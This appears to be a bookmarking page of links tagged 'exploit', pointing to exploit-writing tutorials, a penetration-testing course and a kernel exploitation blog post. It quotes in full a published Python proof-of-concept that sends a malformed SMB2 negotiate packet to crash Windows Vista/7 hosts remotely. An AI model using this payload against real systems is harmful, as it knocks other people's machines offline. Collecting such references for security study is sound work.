Pages tagged exploit:

Writing buffer overflow exploits - a tutorial for beginners
http://mixter.void.ru/exploit.html
ldd arbitrary code execution - good coders code, great reuse
http://www.catonmat.net/blog/ldd-arbitrary-code-execution/

use ldd to hack system
JSON Hijacking
http://haacked.com/archive/2009/06/25/json-hijacking.aspx
Windows Exploit Programming Primer Tutorial
http://securitytube.net/Windows-Exploit-Programming-Primer-video.aspx
Windows Exploit Programming Primer Tutorial
Penetration Testing and Vulnerability Analysis - Home
http://pentest.cryptocity.net/
Penetration Testing and Vulnerability Analysis
Innovative course at NYU-Poly that discusses Penetration Testing and Vulnerability Analysis. The course is split into six 2-week modules where an industry expert comes in and teaches a portion of the course. The website has all the course materials and even some of the lectures in video format.
Full Disclosure: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
http://seclists.org/fulldisclosure/2009/Sep/0039.html
Smb-Bsod.py: #!/usr/bin/python from time import sleep host = "IP_ADDR", 445 buff = ( "\x00\x00\x00\x90" # Begin SMB header: Session message "\xff\x53\x4d\x42" # Server Component: SMB "\x72\x00\x00\x00" # Negociate Protocol "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853 "\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54" "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31" "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" "\x30\x30\x32\x00" ) s = socket() s.connect(host) s.send(buff) s.close()
This is why we do regression testing, folks!
Ksplice » Much ado about NULL: Exploiting a kernel NULL dereference - System administration and software blog
http://blog.ksplice.com/2010/04/exploiting-kernel-null-dereferences/
WEEK 12 -- 04/14/2010
Much ado about NULL: Exploiting a kernel NULL dereference